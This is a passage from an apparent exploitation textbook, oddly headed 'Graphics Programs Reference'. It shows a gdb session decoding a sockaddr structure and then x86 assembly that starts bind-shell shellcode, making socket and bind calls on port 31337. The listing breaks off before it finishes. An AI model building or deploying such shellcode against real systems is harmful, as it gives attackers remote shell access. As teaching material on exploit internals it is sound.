Graphics Programs Reference
In-Depth Information
$2 = 16
(gdb) x/16xb &host_addr
0xbffff780:
0x02 0x00 0x7a 0x69 0x00 0x00 0x00 0x00
0xbffff788: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
(gdb) p /x 27002
$3 = 0x697a
(gdb) p 0x7a69
$4 = 31337
(
gdb)
The next breakpoint happens after the
sockaddr
structure is filled with
values. The debugger is smart enough to decode the elements of the structure
when
host_addr
is printed, but now
you
need to be smart enough to realize the
port is stored in network byte order. The
sin_family
and
sin_port
elements are
both words, followed by the address as a
DWORD
. In this case, the address is
0
,
which means any address can be used for binding. The remaining eight bytes
after that are just extra space in the structure. The first eight bytes in the
structure (shown in bold) contain all the important information.
The following assembly instructions perform all the socket calls needed
to bind to port 31337 and accept TCP connections. The
sockaddr
structure and
the argument arrays are each created by pushing values in reverse order to the
stack and then copying ESP into ECX. The last eight bytes of the
sockaddr
structure aren't actually pushed to the stack, since they aren't used. Whatever
random eight bytes happen to be on the stack will occupy this space, which
is fine.
bind_port.s
BITS 32
; s = socket(2, 1, 0)
push BYTE 0x66 ; socketcall is syscall #102 (0x66).
pop eax
cdq ; Zero out edx for use as a null DWORD later.
xor ebx, ebx ; ebx is the type of socketcall.
inc ebx ; 1 = SYS_SOCKET = socket()
push edx ; Build arg array: { protocol = 0,
push BYTE 0x1 ; (in reverse) SOCK_STREAM = 1,
push BYTE 0x2 ; AF_INET = 2 }
mov ecx, esp ; ecx = ptr to argument array
int 0x80 ; After syscall, eax has socket file descriptor.
mov esi, eax ; save socket FD in esi for later
; bind(s, [2, 31337, 0], 16)
push BYTE 0x66 ; socketcall (syscall #102)
pop eax
inc ebx ; ebx = 2 = SYS_BIND = bind()
push edx ; Build sockaddr struct: INADDR_ANY = 0
push WORD 0x697a ; (in reverse order) PORT = 31337
push WORD bx ; AF_INET = 2
mov ecx, esp ; ecx = server struct pointer
